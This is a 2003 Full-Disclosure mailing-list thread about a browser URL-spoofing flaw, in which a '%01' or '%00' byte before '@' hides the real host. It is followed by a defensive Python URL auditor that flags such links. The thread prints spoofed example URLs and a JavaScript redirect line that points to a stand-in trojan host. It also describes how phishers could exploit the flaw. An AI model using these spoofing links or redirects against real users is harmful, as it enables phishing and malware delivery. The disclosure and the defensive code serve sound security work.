Firebird also re-directs but at least you can see the full address in the title bar.
Tom Tonneson

-----Original Message-----
From: Rainer Gerhards [mailto:[EMAIL PROTECTED]
Sent: 10 December 2003 15:06
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability

Just to add

http://www.microsoft.com:[EMAIL PROTECTED]/

works equally well with Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225 under Red Hat Linux 9. So it is not just an IE issue... Opera at least displays a decent warning and also replaces the password part of the credentials in visible display.

Rainer

On Wed, 2003-12-10 at 13:53, Rainer Gerhards wrote:
> Well, 0x00 works even better (as usual). Consider the following URL:
>
> http://www.microsoft.com:[EMAIL PROTECTED]
>
> This, together with a little social engineering can do much. In my IE 6.0.2800.1106.xpsp2.03422-1633 this takes you to www.linux.org, which is also shown in the address bar. The status bar will show "www.microsoft.com:security" whenever you hover over relative links on the site (check with the news). The trick will most probably work well with fake sites that remove the address bar.
>
> The 0x00 C string terminator causes often quite some troubles. I remember reporting a similar problem to Microsoft some months ago, then related to %00 not being correctly parsed by IIS. It was considered low risk by Microsoft and not immediately addressed (I have to admit I actually think this at least not very high risk...). It should be addressed by now.
>
> Back to the discussed topic: I think it is also not very clever to display credentials in the status bar. So if somebody is dumb enough to actually use URLs with credentials, I think the browser should remove them in all visible elements.
>
> Rainer Gerhards
> Adiscon
>
> ________________________________
>
> From: VeNoMouS [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, December 10, 2003 6:03 AM
> To: Julian HO Thean Swee; [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
>
> umm tested this you don't need %01 either btw.
>
> [EMAIL PROTECTED]
>
> was messing around with some hex stile as well is there a way to call a file:// inside a http:// becos the issue with doing the @ trick is it appends http:// automatically, mind you, u could just make it exec some vb code or something on a site, just a random idea any way
>
> and it don't also seem to work if you use hex as well for the full domain ie
>
> www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67
>
> nor www.microsoft.com%40www.linux.org
>
> whereas if you [EMAIL PROTECTED] works
>
> ----- Original Message -----
>
> From: Julian HO Thean Swee <mailto:[EMAIL PROTECTED]>
> To: '[EMAIL PROTECTED]'
> Sent: Wednesday, December 10, 2003 4:22 PM
> Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
>
> Hmm, it doesn't seem to work on my browser :)
> I don't even get transported to any page when i click the button.
> But then again, i have everything turned off in the internet zone by default...
> (but my submit non-encrypted form data is on)
>
> Does it really work then? it looks like it's using javascript...? (location.href)
> Merry Christmas everyone :)
>
> --__--__--
>
> Message: 1
> Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST)
> From: S G Masood <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
>
> LOL. This is so simple and dangerous, it almost made me laugh and cry at the same time.
> Most of you will realise why...;D
> The Paypal, AOL, Visa, Mastercard, et al email scammers will have a harvest of gold this month with lots of zombies falling for this simple technique.
>
> ># POC ##########
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
>
> Don't be surprised if your latest download from http://www.microsoft.com turns out to be a trojan!
>
> location.href=unescape('http://[EMAIL PROTECTED]
> adaneviltrojanfromme.com);
>
> --
> S.G.Masood
>
> Hyderabad,
> India
>
> PS: One more thing - no scripting required to exploit this.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
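
The checks this thread argues for, as an added example that is not part of the original messages: report the host a URL really points at, flag userinfo that carries control bytes such as %00 or %01 or that reads like a host name, and build a credential-free form for display, as Rainer suggests browsers should. The function names and the `.example` URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, urlunsplit, unquote

CONTROL = re.compile(r"[\x00-\x1f\x7f]")   # covers the 0x00 and 0x01 bytes discussed in the thread
HOSTLIKE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I)

def audit_url(url):
    """Return (real_host, findings) for a link before it is displayed or followed."""
    parts = urlsplit(url)
    findings = []
    userinfo, at, _hostport = parts.netloc.rpartition("@")
    if at:
        findings.append("userinfo-present")
        decoded = unquote(userinfo)
        if CONTROL.search(decoded):
            findings.append("control-char-in-userinfo")
        # Text before the first control byte or ':' is what a truncating display would show.
        visible = CONTROL.split(decoded)[0].split(":")[0]
        if HOSTLIKE.fullmatch(visible):
            findings.append("userinfo-looks-like-host")
    host = parts.hostname or ""
    if "%40" in host:
        # A percent-encoded '@' is not a userinfo delimiter; it stays part of the host.
        findings.append("encoded-at-in-host")
    return host, findings

def display_form(url):
    """Rebuild the URL without credentials, for address-bar or status-bar style display."""
    parts = urlsplit(url)
    hostport = parts.netloc.rpartition("@")[2]
    return urlunsplit((parts.scheme, hostport, parts.path, parts.query, parts.fragment))

# Constructed samples on reserved .example names (not URLs taken from the thread).
SAMPLES = [
    "http://trusted.example%01@other.example/update.exe",
    "http://trusted.example:security%00@other.example/",
    "http://trusted.example%40other.example/",
    "http://other.example/index.html",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        host, findings = audit_url(sample)
        print(f"{display_form(sample):45} host={host:32} {findings}")
```
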
